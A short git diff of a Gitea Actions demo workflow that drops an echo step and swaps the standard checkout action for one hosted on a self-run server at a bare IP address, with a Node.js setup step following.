diff --git a/.gitea/workflows/demo.yaml b/.gitea/workflows/demo.yaml index 88e0bcc..ecf20e1 100644 --- a/.gitea/workflows/demo.yaml +++ b/.gitea/workflows/demo.yaml @@ -5,9 +5,8 @@ on: [push] jobs: build: steps: - - run: echo "🔎 The name of your branch is ${{ gitea.ref }} and your repository is ${{ gitea.repository }}." - - name: Check out repository code - uses: actions/checkout@v3 + - name: Check out repository code ${{ gitea.repository }} + uses: http://47.116.170.60:3300/jeff/MYDOC@0.2 - name: Use gitea Node.js uses: https://gitea.com/actions/setup-node@v4 with: